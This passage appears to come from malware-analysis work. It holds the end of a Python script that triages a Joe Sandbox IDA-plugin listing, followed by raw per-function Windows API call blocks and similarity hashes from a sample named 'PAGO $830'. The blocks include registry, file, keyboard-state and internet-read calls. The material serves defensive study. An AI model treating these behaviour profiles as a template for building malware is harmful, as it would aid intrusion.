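• CloseHandle.KERNEL32(?), ref: 00DFA564
Similarity
• API ID: Process$CloseCountersCurrentHandleOpen
• String ID:
• Opcode ID: 1c31cfbadd0a52e61010fbbfa1f672a9e54d839091676b892e89c6cc31e46fc0
"""

# One call-site entry: optional "Part of subcall function X:" prefix, Api.MODULE, optional "(args)",
# optional comma, then "ref: <hex>".
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<subfn>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
SIMILARITY_FIELDS = {"API ID": "api_id", "String ID": "string_id", "Opcode ID": "opcode_id"}
AUTOIT_MARKER = ">>>AUTOIT NO CMDEXECUTE<<<"  # literal seen as a call argument in this listing

@dataclass
class ApiCall:
    api: str
    module: str
    args: list[str]
    ref: int                        # call-site address from the "ref:" column
    subcall_of: str | None = None   # set for entries attributed to a called sub-function

@dataclass
class FunctionBlock:
    calls: list[ApiCall] = field(default_factory=list)
    api_id: str = ""
    string_id: str = ""
    opcode_id: str = ""

def parse_blocks(text: str) -> list[FunctionBlock]:
    """Split the listing on its 'APIs' headers and collect each block's calls and IDs."""
    blocks: list[FunctionBlock] = []
    cur: FunctionBlock | None = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FunctionBlock()
            blocks.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            args = m["args"].split(",") if m["args"] else []
            cur.calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16), m["subfn"]))
            continue
        for label, attr in SIMILARITY_FIELDS.items():
            prefix = f"• {label}:"
            if line.startswith(prefix):
                setattr(cur, attr, line[len(prefix):].strip())
    return blocks

def _literal(arg: str) -> str:
    """Keep a printed string argument; collapse '?' and bare 8-digit pointers to '?'."""
    return "?" if arg == "?" or re.fullmatch(r"[0-9A-Fa-f]{8}", arg) else arg

def dynamic_resolutions(block: FunctionBlock) -> list[tuple[str, str]]:
    """(library, export) for each GetProcAddress that follows a LoadLibrary*/GetModuleHandle* call
    in the function's own body, in address order; entries from sub-functions are skipped."""
    found: list[tuple[str, str]] = []
    lib = "?"
    for c in sorted((c for c in block.calls if c.subcall_of is None), key=lambda c: c.ref):
        if c.api.startswith(("LoadLibrary", "GetModuleHandle")):
            lib = next((a for a in c.args if a.lower().endswith(".dll")), "?")
        elif c.api == "GetProcAddress":
            found.append((lib, _literal(c.args[1]) if len(c.args) > 1 else "?"))
    return found

def triage(blocks: list[FunctionBlock]) -> list[dict]:
    """One finding per block and pattern: run-time export resolution, AutoIt runtime marker."""
    findings: list[dict] = []
    for b in blocks:
        tag = b.opcode_id[:12] or "<no opcode id>"
        for lib, export in dynamic_resolutions(b):
            findings.append({"function": tag, "kind": "dynamic-resolve", "detail": f"{lib}!{export}"})
        if any(AUTOIT_MARKER in a for c in b.calls for a in c.args):
            findings.append({"function": tag, "kind": "autoit-marker", "detail": AUTOIT_MARKER})
    return findings

if __name__ == "__main__":
    for f in triage(parse_blocks(SAMPLE)):
        print(f"{f['function']}  {f['kind']:16} {f['detail']}")
```

The `?` entries and bare 8-digit values in the argument columns are values the plugin could not recover statically, so an export name is only reported when it was a literal at the call site. Resolving Wow64DisableWow64FsRedirection and its Revert counterpart at run time is also what any interpreter that has to run on 64-bit Windows would do, so treat a "dynamic-resolve" finding as a pointer to a function worth reading, not as a verdict on its own.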
                                                          APIs
                                                          • GetCurrentProcessId.KERNEL32 ref: 00DFA34E
                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00DFA35C
                                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00DFA38F
                                                          • CloseHandle.KERNEL32(?), ref: 00DFA564
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Process$CloseCountersCurrentHandleOpen
                                                          • String ID:
                                                          • API String ID: 3488606520-0
                                                          • Opcode ID: 1c31cfbadd0a52e61010fbbfa1f672a9e54d839091676b892e89c6cc31e46fc0
                                                          • Instruction ID: 576479826048637cde3b11a4ae8789de01236e038cec72521267a1387d6b06a7
                                                          • Opcode Fuzzy Hash: 1c31cfbadd0a52e61010fbbfa1f672a9e54d839091676b892e89c6cc31e46fc0
                                                          • Instruction Fuzzy Hash: CBA19EB16043019FD720DF28C886B2AB7E5EF88714F14C85CF5999B392D7B1ED458BA2
                                                          APIs
                                                            • Part of subcall function 00DDDCFE: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00DDCE40,?), ref: 00DDDD1B
                                                            • Part of subcall function 00DDDCFE: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00DDCE40,?), ref: 00DDDD34
                                                            • Part of subcall function 00DDE0B7: GetFileAttributesW.KERNEL32(?,00DDCEB3), ref: 00DDE0B8
                                                          • lstrcmpiW.KERNEL32(?,?), ref: 00DDE391
                                                          • MoveFileW.KERNEL32(?,?), ref: 00DDE3CA
                                                          • _wcslen.LIBCMT ref: 00DDE509
                                                          • _wcslen.LIBCMT ref: 00DDE521
                                                          • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00DDE56E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                          • String ID:
                                                          • API String ID: 3183298772-0
                                                          • Opcode ID: 43d56a09dcd65872986cbbb35451a4ae84c38239a6055af4cdc20d1c84d89e40
                                                          • Instruction ID: 5f743f2c264f262d2057f0066fbbe30f44625f0564aa60eb81d47a345a59816c
                                                          • Opcode Fuzzy Hash: 43d56a09dcd65872986cbbb35451a4ae84c38239a6055af4cdc20d1c84d89e40
                                                          • Instruction Fuzzy Hash: 08518EB20083849BC724EB94D8819DBB3ECEF84310F44492FF689D7151EF71A6888776
                                                          APIs
                                                            • Part of subcall function 00D7B606: _wcslen.LIBCMT ref: 00D7B610
                                                            • Part of subcall function 00DFC8BF: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DFB5D5,?,?), ref: 00DFC8DC
                                                            • Part of subcall function 00DFC8BF: _wcslen.LIBCMT ref: 00DFC918
                                                            • Part of subcall function 00DFC8BF: _wcslen.LIBCMT ref: 00DFC98F
                                                            • Part of subcall function 00DFC8BF: _wcslen.LIBCMT ref: 00DFC9C5
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DFB9CC
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00DFBA27
                                                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00DFBA8A
                                                          • RegCloseKey.ADVAPI32(?,?), ref: 00DFBACD
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00DFBADA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                          • String ID:
                                                          • API String ID: 826366716-0
                                                          • Opcode ID: ed5cb07c61fbf9c13ef8d33dc13a8006d93e65b63844b3c46418df6e9e9ea17b
                                                          • Instruction ID: 882471e7bb9ce610ccd337b9dcc989edfbf60a8bcdf8632c0cde4ea545f30414
                                                          • Opcode Fuzzy Hash: ed5cb07c61fbf9c13ef8d33dc13a8006d93e65b63844b3c46418df6e9e9ea17b
                                                          • Instruction Fuzzy Hash: 5B619C31208245AFC314DF24C490E2ABBE5FF84318F19C55EF5998B2A2DB71ED45CBA2
                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 00DD8B23
                                                          • VariantClear.OLEAUT32 ref: 00DD8B94
                                                          • VariantClear.OLEAUT32 ref: 00DD8BF3
                                                          • VariantClear.OLEAUT32(?), ref: 00DD8C66
                                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00DD8C91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Variant$Clear$ChangeInitType
                                                          • String ID:
                                                          • API String ID: 4136290138-0
                                                          • Opcode ID: 25fb985cbd357e25de77651f2cbe5ff1df545838350023198f76b44bdf9a2a46
                                                          • Instruction ID: 13b3323bfa44188a4ac7c98511bfe7e3d04ec3bd9e37eb28184fc073dc0fccf0
                                                          • Opcode Fuzzy Hash: 25fb985cbd357e25de77651f2cbe5ff1df545838350023198f76b44bdf9a2a46
                                                          • Instruction Fuzzy Hash: 76516CB5A10219DFCB11CF69C894AAAB7F8FF89310B15856AE955DB310D730E911CBA0
                                                          APIs
                                                          • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00DE8ACC
                                                          • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00DE8AF8
                                                          • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00DE8B50
                                                          • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00DE8B75
                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00DE8B7D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfile$SectionWrite$String
                                                          • String ID:
                                                          • API String ID: 2832842796-0
                                                          • Opcode ID: 793b4354fdd5228d7576aac67b01e1e511f38db30a2950b8c897a4cae427fbea
                                                          • Instruction ID: c61a6af5e632b1532ad80bb8540eaada823997f4b5b820316d0b2573a45fc011
                                                          • Opcode Fuzzy Hash: 793b4354fdd5228d7576aac67b01e1e511f38db30a2950b8c897a4cae427fbea
                                                          • Instruction Fuzzy Hash: 42515A75A00614DFCB01EF65C885A6ABBF5FF48314F08C098E949AB362DB71EC41DBA1
                                                          APIs
                                                          • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00DF8E67
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00DF8EF7
                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00DF8F13
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00DF8F59
                                                          • FreeLibrary.KERNEL32(00000000), ref: 00DF8F79
                                                            • Part of subcall function 00D8F7A8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00DE0F61,?,7529E610), ref: 00D8F7C5
                                                            • Part of subcall function 00D8F7A8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00DCF94D,00000000,00000000,?,?,00DE0F61,?,7529E610,?,00DCF94D), ref: 00D8F7EC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                          • String ID:
                                                          • API String ID: 666041331-0
                                                          • Opcode ID: 48455aaeb0d5f52900ce92329ede712b6a52c9ce31adda1bb7350d45e7837e8a
                                                          • Instruction ID: ffd075fe7e4dc7987ffc8cbd4071eff1128a9cc04e22310d75d98106a5578ac3
                                                          • Opcode Fuzzy Hash: 48455aaeb0d5f52900ce92329ede712b6a52c9ce31adda1bb7350d45e7837e8a
                                                          • Instruction Fuzzy Hash: ED515B35601209DFCB00DF54C4849A9BBF1FF49324B19C0A9F909AB362DB31ED85DBA1
                                                          APIs
                                                          • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00E06B01
                                                          • SetWindowLongW.USER32(?,000000EC,?), ref: 00E06B18
                                                          • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00E06B41
                                                          • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00DEAA97,00000000,00000000), ref: 00E06B66
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00E06B95
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Window$Long$MessageSendShow
                                                          • String ID:
                                                          • API String ID: 3688381893-0
                                                          • Opcode ID: 84bfd941ca174455a39cf768ba39c6d618f546209d3321f46ec2c28f7498f15c
                                                          • Instruction ID: a41949b1b85c55de53d88d6aff0e3bc0358eed6a5789d0fc426c895f68bdd9ce
                                                          • Opcode Fuzzy Hash: 84bfd941ca174455a39cf768ba39c6d618f546209d3321f46ec2c28f7498f15c
                                                          • Instruction Fuzzy Hash: 2E41C179A00104AFDB249F68CC58FAA7BA5EB4A364F145224F915B72E0C771EDA1CA50
                                                          APIs
                                                          • GetCursorPos.USER32(?), ref: 00D8EAAE
                                                          • ScreenToClient.USER32(?,?), ref: 00D8EACB
                                                          • GetAsyncKeyState.USER32(00000001), ref: 00D8EB02
                                                          • GetAsyncKeyState.USER32(00000002), ref: 00D8EB1C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: AsyncState$ClientCursorScreen
                                                          • String ID:
                                                          • API String ID: 4210589936-0
                                                          • Opcode ID: 11889862e5e90d7840e16364c1912c22d373b72cd4ba00142d8bb99e73417b6e
                                                          • Instruction ID: d68d3ce4b5f186d90280d21803c6e5bc334b24348da248e26f46e56c716dac21
                                                          • Opcode Fuzzy Hash: 11889862e5e90d7840e16364c1912c22d373b72cd4ba00142d8bb99e73417b6e
                                                          • Instruction Fuzzy Hash: AF416D7160411AABDB159FA4C844FEEB7B4FF05324F244319E425A72D0C731A994CF61
                                                          APIs
                                                          • GetInputState.USER32 ref: 00DE37E9
                                                          • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00DE3840
                                                          • TranslateMessage.USER32(?), ref: 00DE3869
                                                          • DispatchMessageW.USER32(?), ref: 00DE3873
                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00DE3884
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                          • String ID:
                                                          • API String ID: 2256411358-0
                                                          • Opcode ID: f88c2a882b7937fe1235e2104a3cb694acb7e72be5f6abf9e02363b8adf35224
                                                          • Instruction ID: 6347c3b2d10fd14f99b9fe4504b2d5e1c4ba730e3302183fea459b3b8ed7eb8b
                                                          • Opcode Fuzzy Hash: f88c2a882b7937fe1235e2104a3cb694acb7e72be5f6abf9e02363b8adf35224
                                                          • Instruction Fuzzy Hash: FB31A3745043C19EEF28EB779C8DBB63BA8AB06304F1805ADE452D3090E7659AC9CB31
                                                          APIs
                                                          • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00DEC13C,00000000), ref: 00DECE56
                                                          • InternetReadFile.WININET(?,00000000,?,?), ref: 00DECE8D
                                                          • GetLastError.KERNEL32(?,00000000,?,?,?,00DEC13C,00000000), ref: 00DECED2
                                                          • SetEvent.KERNEL32(?,?,00000000,?,?,?,00DEC13C,00000000), ref: 00DECEE6
                                                          • SetEvent.KERNEL32(?,?,00000000,?,?,?,00DEC13C,00000000), ref: 00DECF10
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                          • String ID:
                                                          • API String ID: 3191363074-0
                                                          • Opcode ID: ec9938611e9bedc1049d9748a92dda094ec7ec081280060ce7b84da0fabb69b4
                                                          • Instruction ID: 68dae6fd79a695203afce17c896e7cea6e7effa401465f64eb25fc2f316c8c63
                                                          • Opcode Fuzzy Hash: ec9938611e9bedc1049d9748a92dda094ec7ec081280060ce7b84da0fabb69b4
                                                          • Instruction Fuzzy Hash: 5A316B72610245AFDB20EFA6C884AABBBF8EF14750B24442EF546E2141D730ED429B70
                                                          APIs
                                                          • GetWindowRect.USER32(?,?), ref: 00DD1859
                                                          • PostMessageW.USER32(00000001,00000201,00000001), ref: 00DD1905
                                                          • Sleep.KERNEL32(00000000,?,?,?), ref: 00DD190D
                                                          • PostMessageW.USER32(00000001,00000202,00000000), ref: 00DD191E
                                                          • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00DD1926
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: MessagePostSleep$RectWindow
                                                          • String ID:
                                                          • API String ID: 3382505437-0
                                                          • Opcode ID: 5a58f896a117b2b0e1c6400d70985469bb0a8f5c694f1718a4615a36f51dba62
                                                          • Instruction ID: faf5a55f6e42077ecc1a171d2f3d70b5c033ec7e42f40f76df636ff7dbfe83fc
                                                          • Opcode Fuzzy Hash: 5a58f896a117b2b0e1c6400d70985469bb0a8f5c694f1718a4615a36f51dba62
                                                          • Instruction Fuzzy Hash: 3731DF75900219FFCB14CFA8DC89ADE3BB5EB04315F10432AF921AB2D0C370A954DBA0
                                                          APIs
                                                          • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00E0567A
                                                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 00E056D2
                                                          • _wcslen.LIBCMT ref: 00E056E4
                                                          • _wcslen.LIBCMT ref: 00E056EF
                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00E0574B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$_wcslen
                                                          • String ID:
                                                          • API String ID: 763830540-0
                                                          • Opcode ID: e52c0520bf80e54e306581f50effd6b435b3eb65f76b4f99c24ee2f59339ed85
                                                          • Instruction ID: a1924879ad8b447090757f0298f89f8aaad6e336c73637bbab848181fcd0ca42
                                                          • Opcode Fuzzy Hash: e52c0520bf80e54e306581f50effd6b435b3eb65f76b4f99c24ee2f59339ed85
                                                          • Instruction Fuzzy Hash: 862193729006089ADB208F94DC44AEE7BB8FF04754F109266E919FA1C4D771D9C5CF60
                                                          APIs
                                                          • IsWindow.USER32(00000000), ref: 00DF0878
                                                          • GetForegroundWindow.USER32 ref: 00DF088F
                                                          • GetDC.USER32(00000000), ref: 00DF08CB
                                                          • GetPixel.GDI32(00000000,?,00000003), ref: 00DF08D7
                                                          • ReleaseDC.USER32(00000000,00000003), ref: 00DF090F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Window$ForegroundPixelRelease
                                                          • String ID:
                                                          • API String ID: 4156661090-0
                                                          • Opcode ID: cb50a5b816671bf47a965c2b6911de44e417dfc9be9bc0693a4ae86b39b0429f
                                                          • Instruction ID: fac5804e20d90172f250342b6b43389542d83253b0e35c840ce399e0f62b724e
                                                          • Opcode Fuzzy Hash: cb50a5b816671bf47a965c2b6911de44e417dfc9be9bc0693a4ae86b39b0429f
                                                          • Instruction Fuzzy Hash: 8521A175600204AFD714EF6ADC84AAA7BF5FF48740B14C038F54AA7352DB31AC44CBA0
                                                          APIs
                                                          • GetEnvironmentStringsW.KERNEL32 ref: 00DACD66
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00DACD89
                                                            • Part of subcall function 00DA37B0: RtlAllocateHeap.NTDLL(00000000,?,00000001,?,00D8FD75,?,?,00D7B63D,00000000,?,?,?,00DE106C,00E0D0D0,?,00DB242E), ref: 00DA37E2
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00DACDAF
                                                          • _free.LIBCMT ref: 00DACDC2
                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00DACDD1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
